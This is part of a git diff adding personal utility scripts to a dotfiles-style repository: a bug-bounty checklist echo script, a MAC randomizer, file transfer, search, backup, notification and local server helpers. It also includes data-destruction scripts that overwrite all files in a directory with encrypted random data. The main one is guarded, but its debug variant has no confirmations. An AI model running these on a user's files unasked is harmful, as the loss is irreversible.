||||||
|
echo "[+] 4. Check if authorization is enforced"
|
||||||
|
echo ""
|
||||||
|
echo "[!] Use Burp Suite to intercept and modify requests"
|
||||||
|
echo "[!] Look for IDs in: URL params, POST body, JSON, cookies"
|
||||||
|
;;
|
||||||
|
|
||||||
|
csrf)
|
||||||
|
echo "[+] Testing for CSRF..."
|
||||||
|
echo "[+] 1. Find state-changing action (password change, email update)"
|
||||||
|
echo "[+] 2. Intercept request in Burp Suite"
|
||||||
|
echo "[+] 3. Check for CSRF token in request"
|
||||||
|
echo "[+] 4. Remove token and replay - does it still work?"
|
||||||
|
echo "[+] 5. Check SameSite cookie attribute"
|
||||||
|
echo ""
|
||||||
|
echo "[!] If no CSRF protection, create PoC HTML page"
|
||||||
|
;;
|
||||||
|
|
||||||
|
*)
|
||||||
|
echo "[-] Unknown vulnerability type: $TYPE"
|
||||||
|
echo "Types: xss, sqli, idor, csrf"
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "[+] When you find a vulnerability:"
|
||||||
|
echo " 1. Take screenshots (Flameshot)"
|
||||||
|
echo " 2. Document PoC steps"
|
||||||
|
echo " 3. Copy template: cp ~/.claude/context/business/security/bug-bounty/templates/<type>.json ~/bug-bounty/discoveries/"
|
||||||
|
echo " 4. Fill in [BRACKETED] fields"
|
||||||
|
echo " 5. Generate report: bun run ~/.claude/context/business/security/bug-bounty/latex/generate.ts"
|
||||||
53
scripts/randomize-mac
Executable file
53
scripts/randomize-mac
Executable file
|
|
@ -0,0 +1,53 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# randomize-mac - Randomize MAC addresses for privacy
|
||||||
|
# Usage: sudo randomize-mac
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
ETHERNET="enp3s0"
|
||||||
|
WIFI="wlp4s0"
|
||||||
|
|
||||||
|
# Check if running as root
|
||||||
|
if [ "$EUID" -ne 0 ]; then
|
||||||
|
echo "❌ This script must be run as root (use sudo)"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "🔄 Randomizing MAC addresses..."
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Randomize Ethernet
|
||||||
|
echo "📡 Ethernet ($ETHERNET):"
|
||||||
|
if ip link show $ETHERNET &>/dev/null; then
|
||||||
|
echo " └─ Before: $(ip link show $ETHERNET | grep ether | awk '{print $2}')"
|
||||||
|
if macchanger -r $ETHERNET 2>/dev/null; then
|
||||||
|
echo " └─ After: $(ip link show $ETHERNET | grep ether | awk '{print $2}')"
|
||||||
|
echo " └─ ✅ Randomized successfully"
|
||||||
|
else
|
||||||
|
echo " └─ ⚠️ Failed (interface may be in use)"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo " └─ ⚠️ Interface not found"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Randomize WiFi
|
||||||
|
echo "📶 WiFi ($WIFI):"
|
||||||
|
if ip link show $WIFI &>/dev/null; then
|
||||||
|
echo " └─ Before: $(ip link show $WIFI | grep ether | awk '{print $2}')"
|
||||||
|
if macchanger -r $WIFI 2>/dev/null; then
|
||||||
|
echo " └─ After: $(ip link show $WIFI | grep ether | awk '{print $2}')"
|
||||||
|
echo " └─ ✅ Randomized successfully"
|
||||||
|
else
|
||||||
|
echo " └─ ⚠️ Failed (interface may be disabled or in use)"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo " └─ ⚠️ Interface not found"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "⚠️ NOTE: You may need to reconnect to your network after randomization!"
|
||||||
|
echo ""
|
||||||
|
echo "💡 TIP: WiFi ($WIFI) is currently disabled. This script will randomize it"
|
||||||
|
echo " when you enable WiFi, preventing tracking on public networks."
|
||||||
14
scripts/receive-file.bat
Normal file
14
scripts/receive-file.bat
Normal file
|
|
@ -0,0 +1,14 @@
|
||||||
|
@echo off
|
||||||
|
echo ════════════════════════════════════════
|
||||||
|
echo FILE RECEIVER - Djedi Consulting
|
||||||
|
echo ════════════════════════════════════════
|
||||||
|
echo.
|
||||||
|
set /p CODE="Enter the code I gave you: "
|
||||||
|
echo.
|
||||||
|
echo Downloading file...
|
||||||
|
croc.exe %CODE%
|
||||||
|
echo.
|
||||||
|
echo ════════════════════════════════════════
|
||||||
|
echo File downloaded to Downloads folder!
|
||||||
|
echo Press any key to close...
|
||||||
|
pause
|
||||||
18
scripts/rfv
Executable file
18
scripts/rfv
Executable file
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
|
||||||
|
# Switch between Ripgrep launcher mode (CTRL-R) and fzf filtering mode (CTRL-F)
|
||||||
|
rm -f /tmp/rg-fzf-{r,f}
|
||||||
|
RG_PREFIX="rg --column --line-number --no-heading --color=always --smart-case "
|
||||||
|
INITIAL_QUERY="${*:-}"
|
||||||
|
fzf --ansi --disabled --query "$INITIAL_QUERY" \
|
||||||
|
--bind "start:reload($RG_PREFIX {q})+unbind(ctrl-r)" \
|
||||||
|
--bind "change:reload:sleep 0.1; $RG_PREFIX {q} || true" \
|
||||||
|
--bind "ctrl-f:unbind(change,ctrl-f)+change-prompt(2. fzf> )+enable-search+rebind(ctrl-r)+transform-query(echo {q} > /tmp/rg-fzf-r; cat /tmp/rg-fzf-f)" \
|
||||||
|
--bind "ctrl-r:unbind(ctrl-r)+change-prompt(1. ripgrep> )+disable-search+reload($RG_PREFIX {q} || true)+rebind(change,ctrl-f)+transform-query(echo {q} > /tmp/rg-fzf-f; cat /tmp/rg-fzf-r)" \
|
||||||
|
--color "hl:-1:underline,hl+:-1:underline:reverse" \
|
||||||
|
--prompt '1. ripgrep> ' \
|
||||||
|
--delimiter : \
|
||||||
|
--header '╱ CTRL-R (ripgrep mode) ╱ CTRL-F (fzf mode) ╱' \
|
||||||
|
--preview 'bat --color=always {1} --highlight-line {2}' \
|
||||||
|
--preview-window 'up,60%,border-bottom,+{2}+3/3,~3' \
|
||||||
|
--bind 'enter:become(hx {1} +{2})'
|
||||||
11
scripts/rn
Executable file
11
scripts/rn
Executable file
|
|
@ -0,0 +1,11 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: rn
|
||||||
|
# Description: Display current time, date, and calendar
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: rn
|
||||||
|
|
||||||
|
date "+%l:%M%p on %A, %B %e, %Y"
|
||||||
|
echo
|
||||||
|
cal | grep -E --color=always "\b$(date '+%e')\b|$"
|
||||||
7
scripts/rsync-vps-backup.sh
Executable file
7
scripts/rsync-vps-backup.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# cron
|
||||||
|
# 0 3 * * 1 /home/youruser/scripts/rsync-n8n-backup.sh
|
||||||
|
|
||||||
|
rsync -avz yourvpsuser@yourvpsip:/home/yourvpsuser/n8n-compose/n8n-data-backup.tar.gz /home/youruser/backups/n8n/
|
||||||
|
|
||||||
20
scripts/running
Executable file
20
scripts/running
Executable file
|
|
@ -0,0 +1,20 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: running
|
||||||
|
# Description: Better process search with PID highlighting
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: running
|
||||||
|
# running firefox
|
||||||
|
# running python
|
||||||
|
|
||||||
|
process_list="$(ps -eo 'pid command')"
|
||||||
|
|
||||||
|
if [[ $# != 0 ]]; then
|
||||||
|
process_list="$(echo "$process_list" | grep -Fiw "$@")"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "$process_list" |
|
||||||
|
grep -Fv "${BASH_SOURCE[0]}" |
|
||||||
|
grep -Fv grep |
|
||||||
|
GREP_COLORS='mt=00;35' grep -E --colour=auto '^\s*[[:digit:]]+'
|
||||||
247
scripts/secure-overwrite-files
Executable file
247
scripts/secure-overwrite-files
Executable file
|
|
@ -0,0 +1,247 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# secure-overwrite-files - Securely overwrite files with encrypted random data
|
||||||
|
# ⚠️ WARNING: THIS PERMANENTLY DESTROYS DATA - USE WITH EXTREME CAUTION
|
||||||
|
#
|
||||||
|
# Usage:
|
||||||
|
# secure-overwrite-files --dry-run /path/to/files # See what would happen
|
||||||
|
# secure-overwrite-files /path/to/files # Actually overwrite
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Detect WSL and set compatibility flags
|
||||||
|
IS_WSL=false
|
||||||
|
if grep -qiE '(microsoft|wsl)' /proc/version 2>/dev/null || [ -n "${WSL_DISTRO_NAME:-}" ]; then
|
||||||
|
IS_WSL=true
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Colors for warnings
|
||||||
|
RED='\033[0;31m'
|
||||||
|
YELLOW='\033[1;33m'
|
||||||
|
GREEN='\033[0;32m'
|
||||||
|
NC='\033[0m' # No Color
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
DRY_RUN=false
|
||||||
|
TARGET_DIR=""
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
--dry-run)
|
||||||
|
DRY_RUN=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
--help|-h)
|
||||||
|
cat <<EOF
|
||||||
|
Secure File Overwriting Tool
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
$0 --dry-run /path/to/files # Preview what would happen
|
||||||
|
$0 /path/to/files # Actually overwrite files
|
||||||
|
|
||||||
|
⚠️ WARNING: This PERMANENTLY DESTROYS data by overwriting with encrypted random noise.
|
||||||
|
This is IRREVERSIBLE. Ensure you have backups before proceeding.
|
||||||
|
|
||||||
|
Safety Features:
|
||||||
|
- Requires explicit directory path (won't work in current directory by accident)
|
||||||
|
- Multiple confirmation prompts
|
||||||
|
- Dry-run mode to preview actions
|
||||||
|
- Skips system directories and hidden files
|
||||||
|
- Shows file list before proceeding
|
||||||
|
|
||||||
|
Use Cases:
|
||||||
|
- Overwriting sensitive files in cloud storage before deletion
|
||||||
|
- Securely erasing data from external drives
|
||||||
|
- Preparing media for disposal
|
||||||
|
|
||||||
|
EOF
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
TARGET_DIR="$1"
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Validate target directory
|
||||||
|
if [ -z "$TARGET_DIR" ]; then
|
||||||
|
echo -e "${RED}❌ ERROR: No target directory specified${NC}"
|
||||||
|
echo "Usage: $0 [--dry-run] /path/to/files"
|
||||||
|
echo "Run with --help for more information"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ ! -d "$TARGET_DIR" ]; then
|
||||||
|
echo -e "${RED}❌ ERROR: Directory does not exist: $TARGET_DIR${NC}"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Convert to absolute path
|
||||||
|
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)
|
||||||
|
|
||||||
|
# Safety check: Don't allow certain dangerous paths
|
||||||
|
DANGEROUS_PATHS=(
|
||||||
|
"/"
|
||||||
|
"/home"
|
||||||
|
"/etc"
|
||||||
|
"/usr"
|
||||||
|
"/var"
|
||||||
|
"/bin"
|
||||||
|
"/sbin"
|
||||||
|
"/boot"
|
||||||
|
"$HOME"
|
||||||
|
"$HOME/.ssh"
|
||||||
|
"$HOME/.gnupg"
|
||||||
|
)
|
||||||
|
|
||||||
|
for dangerous in "${DANGEROUS_PATHS[@]}"; do
|
||||||
|
if [ "$TARGET_DIR" = "$dangerous" ]; then
|
||||||
|
echo -e "${RED}❌ DANGER: Refusing to operate on system directory: $TARGET_DIR${NC}"
|
||||||
|
echo "This would destroy your system!"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# Get list of files (skip hidden files and directories)
|
||||||
|
# Using portable array building that works on WSL, Linux, and any bash 3.2+
|
||||||
|
FILES=()
|
||||||
|
while IFS= read -r -d '' file; do
|
||||||
|
FILES+=("$file")
|
||||||
|
done < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*" -print0)
|
||||||
|
|
||||||
|
if [ ${#FILES[@]} -eq 0 ]; then
|
||||||
|
echo -e "${YELLOW}⚠️ No files found in: $TARGET_DIR${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Display warnings and file list
|
||||||
|
echo ""
|
||||||
|
echo -e "${RED}╔════════════════════════════════════════════════════════════╗${NC}"
|
||||||
|
echo -e "${RED}║ ⚠️ SECURE FILE OVERWRITE - IRREVERSIBLE DATA DESTRUCTION ║${NC}"
|
||||||
|
echo -e "${RED}╚════════════════════════════════════════════════════════════╝${NC}"
|
||||||
|
echo ""
|
||||||
|
echo -e "${YELLOW}Target Directory:${NC} $TARGET_DIR"
|
||||||
|
echo -e "${YELLOW}Files to overwrite:${NC} ${#FILES[@]}"
|
||||||
|
if [ "$IS_WSL" = true ]; then
|
||||||
|
echo -e "${YELLOW}Environment:${NC} WSL (Windows Subsystem for Linux)"
|
||||||
|
fi
|
||||||
|
echo ""
|
||||||
|
echo "The following files will be PERMANENTLY DESTROYED:"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
for file in "${FILES[@]}"; do
|
||||||
|
filename=$(basename "$file")
|
||||||
|
filesize=$(du -h "$file" | cut -f1)
|
||||||
|
echo " 📄 $filename ($filesize)"
|
||||||
|
done
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
if [ "$DRY_RUN" = true ]; then
|
||||||
|
echo -e "${GREEN}🔍 DRY RUN MODE - No files will be modified${NC}"
|
||||||
|
echo ""
|
||||||
|
echo "What would happen:"
|
||||||
|
echo " 1. Each file above would be overwritten with encrypted random data"
|
||||||
|
echo " 2. Original content would be permanently destroyed"
|
||||||
|
echo " 3. Files would remain with same names but contain only encrypted noise"
|
||||||
|
echo ""
|
||||||
|
echo "To actually perform this operation, run:"
|
||||||
|
echo " $0 $TARGET_DIR"
|
||||||
|
echo ""
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# First confirmation
|
||||||
|
echo -e "${RED}⚠️ THIS WILL PERMANENTLY DESTROY ${#FILES[@]} FILES!${NC}"
|
||||||
|
echo ""
|
||||||
|
read -p "Are you ABSOLUTELY SURE you want to continue? Type 'YES' in all caps: " confirm1
|
||||||
|
|
||||||
|
if [ "$confirm1" != "YES" ]; then
|
||||||
|
echo -e "${GREEN}✅ Aborted. No files were modified.${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Second confirmation with directory name
|
||||||
|
echo ""
|
||||||
|
echo -e "${RED}⚠️ FINAL CONFIRMATION${NC}"
|
||||||
|
echo "You are about to overwrite all files in:"
|
||||||
|
echo " $TARGET_DIR"
|
||||||
|
echo ""
|
||||||
|
read -p "Type the full directory path to confirm: " confirm2
|
||||||
|
|
||||||
|
if [ "$confirm2" != "$TARGET_DIR" ]; then
|
||||||
|
echo -e "${GREEN}✅ Aborted. Path did not match. No files were modified.${NC}"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Third confirmation - countdown
|
||||||
|
echo ""
|
||||||
|
echo -e "${RED}Beginning file destruction in:${NC}"
|
||||||
|
for i in 5 4 3 2 1; do
|
||||||
|
echo " $i..."
|
||||||
|
sleep 1
|
||||||
|
done
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
# Perform the overwriting
|
||||||
|
echo -e "${YELLOW}🔄 Overwriting files with encrypted random data...${NC}"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
SUCCESS_COUNT=0
|
||||||
|
FAIL_COUNT=0
|
||||||
|
|
||||||
|
for file in "${FILES[@]}"; do
|
||||||
|
filename=$(basename "$file")
|
||||||
|
filesize=$(stat -c%s "$file")
|
||||||
|
|
||||||
|
# Determine size in MB (minimum 1MB)
|
||||||
|
size_mb=$(( (filesize / 1048576) + 1 ))
|
||||||
|
if [ $size_mb -lt 1 ]; then
|
||||||
|
size_mb=1
|
||||||
|
fi
|
||||||
|
|
||||||
|
printf " 📄 %s ... " "$filename"
|
||||||
|
|
||||||
|
# Flush output immediately
|
||||||
|
sync 2>/dev/null || true
|
||||||
|
|
||||||
|
# Create encrypted random data with same name
|
||||||
|
if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
|
||||||
|
gpg --symmetric --cipher-algo AES256 --batch \
|
||||||
|
--passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
|
||||||
|
|
||||||
|
# Verify temp file was created
|
||||||
|
if [ ! -f "${file}.tmp" ]; then
|
||||||
|
printf "${RED}✗ Failed (temp file not created)${NC}\n"
|
||||||
|
((FAIL_COUNT++)) || true
|
||||||
|
continue
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Replace original with encrypted noise (both variables fully quoted)
|
||||||
|
if mv "${file}.tmp" "${file}"; then
|
||||||
|
printf "${GREEN}✓ Destroyed${NC}\n"
|
||||||
|
((SUCCESS_COUNT++)) || true
|
||||||
|
else
|
||||||
|
printf "${RED}✗ Failed (mv error: $?)${NC}\n"
|
||||||
|
((FAIL_COUNT++)) || true
|
||||||
|
rm -f "${file}.tmp" 2>/dev/null || true
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
printf "${RED}✗ Failed (encryption error)${NC}\n"
|
||||||
|
((FAIL_COUNT++)) || true
|
||||||
|
rm -f "${file}.tmp" 2>/dev/null || true
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "═══════════════════════════════════════"
|
||||||
|
echo -e "${GREEN}✅ Complete${NC}"
|
||||||
|
echo " Successfully destroyed: $SUCCESS_COUNT files"
|
||||||
|
if [ $FAIL_COUNT -gt 0 ]; then
|
||||||
|
echo -e " ${RED}Failed: $FAIL_COUNT files${NC}"
|
||||||
|
fi
|
||||||
|
echo ""
|
||||||
|
echo "⚠️ Original data is now PERMANENTLY UNRECOVERABLE"
|
||||||
|
echo "You can now delete these files from cloud storage."
|
||||||
|
echo ""
|
||||||
72
scripts/secure-overwrite-files-debug
Executable file
72
scripts/secure-overwrite-files-debug
Executable file
|
|
@ -0,0 +1,72 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# DEBUG VERSION - Shows exactly what commands are being run
|
||||||
|
# Usage: secure-overwrite-files-debug /path/to/directory
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
set -x # Print every command before executing
|
||||||
|
|
||||||
|
TARGET_DIR="$1"
|
||||||
|
|
||||||
|
if [ ! -d "$TARGET_DIR" ]; then
|
||||||
|
echo "ERROR: Not a directory: $TARGET_DIR"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)
|
||||||
|
|
||||||
|
mapfile -t FILES < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*")
|
||||||
|
|
||||||
|
echo "Found ${#FILES[@]} files:"
|
||||||
|
for file in "${FILES[@]}"; do
|
||||||
|
echo " - $file"
|
||||||
|
done
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "Processing files..."
|
||||||
|
|
||||||
|
for file in "${FILES[@]}"; do
|
||||||
|
filename=$(basename "$file")
|
||||||
|
filesize=$(stat -c%s "$file")
|
||||||
|
|
||||||
|
size_mb=$(( (filesize / 1048576) + 1 ))
|
||||||
|
if [ $size_mb -lt 1 ]; then
|
||||||
|
size_mb=1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "=== Processing: $filename ==="
|
||||||
|
echo " Full path: $file"
|
||||||
|
echo " Size: ${filesize} bytes"
|
||||||
|
echo " Will create: ${size_mb}MB encrypted file"
|
||||||
|
echo " Temp file: ${file}.tmp"
|
||||||
|
|
||||||
|
echo -n " Creating encrypted data... "
|
||||||
|
if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
|
||||||
|
gpg --symmetric --cipher-algo AES256 --batch \
|
||||||
|
--passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then
|
||||||
|
echo "✓"
|
||||||
|
|
||||||
|
echo " Temp file created:"
|
||||||
|
ls -lh "${file}.tmp"
|
||||||
|
|
||||||
|
echo -n " Moving temp to final location... "
|
||||||
|
echo " Command: mv \"${file}.tmp\" \"${file}\""
|
||||||
|
|
||||||
|
if mv "${file}.tmp" "${file}"; then
|
||||||
|
echo "✓ SUCCESS"
|
||||||
|
echo " Final file:"
|
||||||
|
ls -lh "$file"
|
||||||
|
else
|
||||||
|
echo "✗ FAILED"
|
||||||
|
echo " ERROR CODE: $?"
|
||||||
|
ls -la "${file}.tmp" "$file" 2>&1 || true
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "✗ FAILED to create encrypted file"
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo "=== COMPLETE ==="
|
||||||
|
echo "Final directory state:"
|
||||||
|
ls -lah "$TARGET_DIR"
|
||||||
84
scripts/send-ntfy
Executable file
84
scripts/send-ntfy
Executable file
|
|
@ -0,0 +1,84 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# send-ntfy - Send notification via ntfy using credentials from ~/.env
|
||||||
|
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Load credentials from ~/.env
|
||||||
|
if [ -f "$HOME/.env" ]; then
|
||||||
|
set -a
|
||||||
|
source "$HOME/.env"
|
||||||
|
set +a
|
||||||
|
else
|
||||||
|
echo "Error: ~/.env not found" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check for URL
|
||||||
|
if [ -z "${NTFY_URL:-}" ]; then
|
||||||
|
echo "Error: NTFY_URL must be set in ~/.env" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Add https:// if missing
|
||||||
|
if [[ ! "$NTFY_URL" =~ ^https?:// ]]; then
|
||||||
|
NTFY_URL="https://$NTFY_URL"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
TOPIC="${1:-alerts}"
|
||||||
|
MESSAGE="${2:-}"
|
||||||
|
TITLE="${3:-}"
|
||||||
|
PRIORITY="${4:-default}"
|
||||||
|
TAGS="${5:-}"
|
||||||
|
|
||||||
|
if [ -z "$MESSAGE" ]; then
|
||||||
|
echo "Usage: send-ntfy <topic> <message> [title] [priority] [tags]" >&2
|
||||||
|
echo "" >&2
|
||||||
|
echo "Examples:" >&2
|
||||||
|
echo " send-ntfy alerts 'Backup completed'" >&2
|
||||||
|
echo " send-ntfy security 'Suspicious login' 'Security Alert' urgent 'warning,shield'" >&2
|
||||||
|
echo " send-ntfy personal 'Meeting in 5 minutes'" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Build full URL with topic
|
||||||
|
FULL_URL="$NTFY_URL/$TOPIC"
|
||||||
|
|
||||||
|
# Build curl options array
|
||||||
|
CURL_OPTS=(
|
||||||
|
-s
|
||||||
|
--http1.1
|
||||||
|
-w "\n%{http_code}"
|
||||||
|
-d "$MESSAGE"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add authentication
|
||||||
|
if [ -n "${NTFY_TOKEN:-}" ]; then
|
||||||
|
CURL_OPTS+=(-H "Authorization: Bearer $NTFY_TOKEN")
|
||||||
|
elif [ -n "${NTFY_AUTH:-}" ]; then
|
||||||
|
CURL_OPTS+=(-u "$NTFY_AUTH")
|
||||||
|
else
|
||||||
|
echo "Error: NTFY_TOKEN or NTFY_AUTH must be set in ~/.env" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Add optional headers
|
||||||
|
[ -n "$TITLE" ] && CURL_OPTS+=(-H "Title: $TITLE")
|
||||||
|
[ -n "$PRIORITY" ] && CURL_OPTS+=(-H "Priority: $PRIORITY")
|
||||||
|
[ -n "$TAGS" ] && CURL_OPTS+=(-H "Tags: $TAGS")
|
||||||
|
|
||||||
|
# Send notification
|
||||||
|
RESULT=$(curl "${CURL_OPTS[@]}" "$FULL_URL" 2>&1)
|
||||||
|
|
||||||
|
# Extract HTTP code
|
||||||
|
HTTP_CODE=$(echo "$RESULT" | tail -1)
|
||||||
|
RESPONSE=$(echo "$RESULT" | sed '$d')
|
||||||
|
|
||||||
|
if [ "$HTTP_CODE" = "200" ]; then
|
||||||
|
echo "✅ Notification sent to $TOPIC"
|
||||||
|
exit 0
|
||||||
|
else
|
||||||
|
echo "❌ Failed: HTTP $HTTP_CODE" >&2
|
||||||
|
[ -n "$RESPONSE" ] && echo "Response: $RESPONSE" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
30
scripts/serveit
Executable file
30
scripts/serveit
Executable file
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: serveit
|
||||||
|
# Description: Quick static file server on localhost
|
||||||
|
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: serveit [port] # defaults to 8000
|
||||||
|
|
||||||
|
port='8000'
|
||||||
|
if [[ $# -eq 1 ]]; then
|
||||||
|
port="$1"
|
||||||
|
fi
|
||||||
|
|
||||||
|
if hash php 2>/dev/null; then
|
||||||
|
exec php -S "localhost:$port"
|
||||||
|
elif hash python3 2>/dev/null; then
|
||||||
|
exec python3 -m http.server "$port"
|
||||||
|
elif hash python 2>/dev/null; then
|
||||||
|
major_version="$(python -c 'import platform as p;print(p.python_version_tuple()[0])')"
|
||||||
|
if [[ "$major_version" == '3' ]]; then
|
||||||
|
exec python -m http.server "$port"
|
||||||
|
else
|
||||||
|
exec python -m SimpleHTTPServer "$port"
|
||||||
|
fi
|
||||||
|
elif hash ruby 2>/dev/null; then
|
||||||
|
exec ruby -run -e httpd . -p "$port"
|
||||||
|
else
|
||||||
|
echo 'unable to start HTTP server' >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue